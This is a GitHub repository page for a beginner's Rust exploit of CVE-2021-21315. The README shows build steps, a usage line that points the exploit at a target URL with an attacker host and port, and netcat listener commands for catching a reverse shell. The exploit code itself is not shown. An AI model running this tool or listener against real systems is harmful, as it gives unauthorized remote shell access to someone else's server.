Skip to content

rust noob tried write easy exploit code with rust lang

Notifications You must be signed in to change notification settings

G01d3nW01f/CVE-2021-21315

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits
 
 
 
 
 
 

Repository files navigation

the CVE-2021-21315's exploit code wrote with Rust lang

I'm rust noob so this code was my part of RustLang practices

Yes!!Let's Get the reverse shell!!!!!!!!!!

[!]for education or researching only

Build

cargo build

Usage

./exploit <targetURL/path/of/api> <LHOST> <LPORT>

./exploit http://target.com/api/osinfo?param 172.17.2.1 1234   

need Netcat for Listener to catch reverse shell


nc -nlvp <lport>
nc -nlvp 1234

alt text

About

rust noob tried write easy exploit code with rust lang

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages